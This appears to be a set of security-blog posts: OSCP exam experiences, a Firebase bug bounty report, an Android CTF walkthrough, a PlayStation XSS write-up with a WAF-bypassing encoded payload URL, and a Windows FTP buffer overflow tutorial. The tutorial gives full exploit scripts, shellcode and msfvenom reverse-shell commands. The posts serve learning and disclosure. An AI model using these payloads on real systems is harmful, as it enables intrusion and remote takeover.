For a beginner,OSCP isn’t an easy challenge. It was a big challenge for me too. But if we did enough preparation and practice,the exam isn’t gonna be hard. I took my oscp exam on 17th December 2020 and passed on 20th December 2020.Today I will share about my experience in my OSCP journey.
OSCP is a well-known certification in Cyber Security field and also recognized by most of security companies.The exam duration is 24 hour(precisely 23 hour & 45 minute).During exam,you need to pentest 5 boxes(window or linux machines).If you want to know details about OSCP, you can learn at offensive security website.(https://www.offensive-security.com/pwk-oscp/)
Before challenging OSCP,I tried to solve HTB(app.hackthebox.eu)’s active and retired machines. Then,I completed most of them. For retired machines,there is a great Ippsec youtube channel.Not only he shares walkthroughs of how he rooted machines but also gives tons of tips and tricks that might come in handy for exam.I practiced netsecfocus OSCP like machines from Vulnhub and also enrolled TryHackMe oscp learning path which is really helpful for win32 buffer overflow. For windows privilege escalation,I studied Tib3rius’s windows privilege escalation course. Then,I decided to register the OSCP course together with my team member,Ba Htoo on 6th October and got access to labs and course materials on 11th October. Most of PWK lab machines aren’t straightforward like exam machines but some lab machines are similar to OSCP like machines from HackTheBox and Vulnhub. I followed PWK Labs Learning Path and completed about 40 lab machines before my lab time expires. After that,I scheduled my exam date on 17th Dec and did some preparations like taking notes,bookmarking helpful documents and useful blog posts before the exam.
Ippsec Youtube channel
For netsecfocus OSCP like machines
TryHackMe OSCP path
Tib3rius’s windows privilege escalation course
PWK Labs Learning Path
For more practice,there is a practice proving ground by offensive security and machines are created by offsec experts. Those machines are also helpful for the exam.
Some useful cheatsheets and blog posts
My exam was scheduled at 10:30 am. As the exam is proctored, I had to screenshare and allowed the proctorer access to my webcam. Then, he checked my passport for identification and I had to show around the room as they asked like corners and under the desk. After the proctorer confirms everything,I received VPN connectivity pack to connect the exam network. Then,I connected the exam network and I was allocated 6 machines: 5 exam machines and 1 Windows Test VM. This VM is the debugger for testing buffer overflow and writing exploits. As usual,I started scanning all machines and chose to compromise 25 point win23 buffer overflow machine first. After that, I kept moving onto 10 point machine and then tried another 20 point machine. Rooting those three machines took me about 14 hours. The last 25 point machine was a challenge for me that I only got user shell. In order to pass the exam, I need to score 70 points. I took a break and slept for a while. Then, I tried again and got reverse shell as root. Finally, I had done 4 machines. Therefore, I took screenshots, notes and checked again all of finished machines. At the moment, I found a mistake in finding bad chars that there was an extra bad char in my list but I didn’t notice before because I got system shell on either testing VM or real machine. I just removed the extra bad char and run the exploit again and got administrator shell. After the proctored exam have ended, I started reporting. After checking the report several times, I submitted my report and got my exam result on 20th December. I passed the OSCP exam on my first attempt.
This is my bug bounty write up about firebase database takeover vulnerability which I found in android app. There are just a few resources about android hacking. This article aims to briefly documents about one of the android vulnerability called firebase database takeover vulnerability. For this purpose I will share my finding about this vulnerability. I will blur some of the company information. Being said that , let’s get jump in.
1. Download application from google playstore.
2. Use apk extractor to extract apk.
3. I used bluestack emulator.
4. Use apktool to decompile the application.
5. Go to res/values/strings/xml
6.Look for firebase url
7.I wrote a python script to insert data
8.POC(Proof Of Concept)
This application doesn’t need any access _token to insert data to the firebase database. It is completely open and anybody can access it without any credentials.
Vulnerability Reported – 15 October, 2020 3:37 AM.
Replied – 15 October, 2020 12:31 PM
Rewarded $100 for two reports – 21 October, 2020 11:21 AM.
I really appreciate the company for very fast reply when I was submitting the vulnerability and they replied me to disclose this vulnerability. I really enjoy finding bugs in their organization and thanks for agreeing to disclose this report and rewarding me a bounty.
Hello , I am Chan. Today I want to write an article about android ctf challenge from Infosec Mobile CTF 2018. I know that there is a few resources about android pentesting while I was learning android pentest and so I want to make more articles about android pentest and want to share my knowledge to community.
Being said that , this article aims to briefly document some techniques and tools involved in the vulnerability assessment of android applications. For this purpose , we will solve the 1st challenge of Infosec mobile CTF and learn the mobile pentest through CTF Challenges. Please get the apk from here.
I am going to use blue stack emulator to solve this challenge. So I already seted up the emulator and just going to click on the app and it will install automatically.
App CTF Challenge 1: The goal behind this challenge is to figure out the username and password that would let the challenger login successfully. The flag should be “password:username”. (ends 4/6)
I will use apktool to decompile the apk.
apktool d App1.apk
I used dex2jar to decompile the apk to jar file
We can see that com.ctf.app1 is the package of the apk file and there is no interesting things on the Buildconfig.class
It is pretty obivious that this is md5 decrypt function.
As we saw the md5 function in above picture and now we can see that there is a md5 string. There is a function called OnClick.
What this function does is , it takes the username and password from user, combine them into one string and hash it using md5 and comparing the hash to 263c7fa932b26a56ec0ad76b94aff98b.
I used this website https://hashes.com/en/decrypt/hash to decrypt md5 hash.
As they mentioned in Challenge Description the flag is the username and password.
Username - admin Password - [email protected]
After submitting the username and password, we got the smile face:)
This is my first article about android pentest. If you would like to learn more about android pentest challenge, please keep reading in my blog. I will upload more about the android pentest challenges and solution. Also this is gonna be a series of learning android pentest through CTF challenges.
If you like this article, please share on your social media and share to your friends.
When people heard OSCP, they think the exam like a beast or a monster which will tear them apart. Yes, i did think like them in the past but with proper preparation, any beast or exam can be defeated. I took oscp exam on 27th August 2020 and passed on 31st August 2020. Today i will share you about my experience in the OSCP journey.
OSCP (called Offensive Security Certified Professional) is a well known certification in Cyber Security. It is famous for its 100% hands on exam which is really quite challenging. The exam duration is 24 hour(precisely 23 hour & 45 minute). In the exam, you have to do penetration testing on 5 boxes (means 5 computer servers),so the timing is also very important.If you want to know details about oscp, you can google it cuz i’m not going to explain in details.
Before doing OSCP, i spent most of my time solving the netsecfocus OSCP like machines from vulnhub and hackthebox. I completed 85% of the machines. Then I decided to purchase the OSCP course on june 27 and got access to labs and materials on july 5. In 20 days, I solved 35 machines from oscp labs including the big 4 which are considered to be difficult but not much difficult as hackthebox hard machines :C . Then i worried about my windows privilege escalation skill and decided to purchase the Tib3rius’s windows privilege escalation course which is really good for beginners.I did that course and just went roughly through the tryhackme oscp learning path. Then i decided to schedule my exam date on 27th August and relax my mind for 5 days before the exam.
For netsecfocus OSCP like machines
Tib3rius’s windows privilege escalation course
Tryhackme OSCP path
I scheduled my time at 7:30 am. A morning time is refreshing and is the best time to start. Due to my poor internet connection, i started at 7:50 am. The internet connection is very important for this exam. The exam is proctored. The proctorer checked the passport for identification and i had to show around the room, under the desk as they asked. I had to screenshare and allowed access proctorer to my webcam. So i recommend to check the screensharing and webcam before taking exam. As usual i did all the scanning on all boxes while doing bufferoverflow. Before starting exam, I started my windows 7 virutal box on my kali for preparation but it turned out to be very disadvantageous. My laptop was super slow and laggy. I was nervous bcuz of time late and the immunity dubugger was very laggy on my machine. Due to nervous,i made mistakes. I did the bufferoverflow patiently and after one and a half hours i got the flag. Then i saw my masscan did not get any output from one of the machines. I decided to scan it again and then my laptop got hanged. I had to restart my laptop in hurry and emailed the OSCP support about my problems. I reconnected to the exam panel and told about my problems. Then i resumed my exam but sadly i did not output any scan results. So, i decided to scan and did the boxes one after one. At sharp 1:30 pm, I had done 4 boxes and decided to get lunch. After lunch, i decided to do the reporting first because i’m bad at reporting and worried about my screenshots. After checking my report several times and i ended my exam. In the next morning, I submitted my report and got my exam result on 31st August. I passed the OSCP exam on my 1st attempt.
Hello all!!! Today i decided to share my finding of xss on subdomain of playstation. It was 1 year ago i think, i started hunting bug on sony websites and first i found directory indexing on [ https://blog.latam.playstation.com/wp-content/ https://blog.latam.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp-content/ https://blog.br.playstation.com/wp/wp-includes/ https://blog.br.playstation.com/wp-content/ https://rd.playstation.com/ ]
Then i reported to sony and they didn’t accept because they could not find any impact.I didnt understand why they said that :3 and i was like okay.Then I tried to dig more into the folders and found this page [ https://blog.latam.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html ]. I found Qunit 1.21.0 on the page and i decided to find exploit on google. Then i found this page.
There are two pocs and the 2nd poc shows that the parameter testId is vulnerable to xss.So i decided to give it a try.First i injected payload <svg onload=alert(1)> and waf filters it.Then i fuzzed a lot and at last boom! double url encoding bypass the waf.
So the POC link is [ https://blog.us.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html?testId=%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%65 ].
Then i reported the bug and they replied back after 3 months and rewarded a swag that was never shipped to me :V .
Thats my story of xss on playstation. Hope you like it. Thanks!!!
Today I will show how to exploit the 32bit windows buffer overflow .This is my first post of writing blog post.
Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs
A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.
There is alot of tutorials about this 32bit ftp windows buffer overflow But I want to use the modern technique while the exploit the windows buffer overflow.Let’s start.
First u need to load the 32bit ftp in immunity debugger.
File > open > select the ftp file and open.
When i try run via debugger ,its ask me ftp server ip and port.So we need create the ftp server and let that client ftp connect to us.Let create the simple ftp server using pwntools.
from pwn import * l = listen(21) payload ="Sent some strings" _ = l.wait_for_connection() l.sendline("220 " + payload)
sudo python test.py
Important ; Once u run the debgger ,every time u need to restart the debugger by pressing ctr+f2 or Debug tab > restart.
Next step . let crash the client ftp with a bunch of “A”
from pwn import * l = listen(21) payload ="A"*1000 _ = l.wait_for_connection() l.sendline("220"+payload)
Great!. It crash . When we focus the EIP in debugger the Stack fill with alot of “A” .(EIP 41414141)
All of the registers have been overwritten by 41 (hex for A). This means that we have a buffer overflow vulnerability on our hands and we have proven that we can overwrite the EIP. At this point, we know that the EIP is located somewhere between 1 and 1000 bytes, but we are not sure where it’s located exactly. What we need to do next is figure out exactly where the EIP is located (in bytes) and attempt to control it.
Next step is to find offset .Let’s find .
from pwn import * l = listen(21) payload =cyclic(1000) _ = l.wait_for_connection() l.sendline("220 " + payload)
Select the EIP address (786A6161) and find with cyclic_find()
Offset = 989
To execute shellcode, we need to find a JMP/CALL ESP memory address, so EIP will read it and jump to the memory address stored in ESP. When you loaded the FTP client program in Immunity, you saw the kernel32.dll module was also loaded.So we jump that address let the shellcode run.
!mona jmp -r esp -m kernel
U will see 3 jmp esp addresses and 2 call esp addresses .U can use one of them .All addresses is worked.So, let jump this addresses with shellcode.Firstly I will execute the calculator .After this i will show how to generate reverse shell and exploit this.Let’s Pop calculator.
To generate the calc using msfvenom
msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b “\x00”
Note: This ftp doesn’t contains any bad characters .So I will not show u how find bad characters in easy way and how avoid them.But I will write in another post .
Ths goal is Buffer + jmp esp + NOP + shellcode .
Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.
Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.
The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.
A 128-byte NOP sled is just a group of NOP intructions 128 bytes wide.
NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.
NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.
Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work
from pwn import * payload ="\x41"*989 #jmp esp address payload +=p32(0x765A3132) payload += "\x90" * 30 payload += ( "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" "\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b" "\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" "\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73" "\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61" "\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" ) l = listen(21) _ = l.wait_for_connection() l.sendline("220 " + payload)
Ogay. cacl.exe pop up successfully .now I will generate the reverse shellcode using msfvenom.Coz i wanna control this machine ,popping calc isn’t enough for me :D….
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 –platform win -e x86/alpha_mixed -f c -b ‘\x00’
Put the result in python script and run .
from pwn import * payload ="\x41"*989 #jmp esp address payload +=p32(0x771F3132) payload += "\x90"*30 payload += ( "\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c" "\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30" "\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63" "\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f" "\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a" "\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42" "\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c" "\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71" "\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37" "\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b" "\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76" "\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43" "\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46" "\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b" "\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c" "\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74" "\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b" "\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b" "\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35" "\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c" "\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c" "\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34" "\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b" "\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68" "\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66" "\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70" "\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a" "\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75" "\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57" "\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57" "\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53" "\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f" "\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55" "\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50" "\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a" "\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46" "\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69" "\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78" "\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70" "\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45" "\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a" "\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65" "\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39" "\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51" "\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63" "\x30\x61\x43\x49\x6f\x5a\x75\x41\x41" ) l = listen(21) _ = l.wait_for_connection() l.sendline("220 " + payload)
Wait for connection in another terminal .
Exploit development is the long way journey .It’s endless, We just need to run. 😀 😀
If u face any trouble during testing .Just ping me.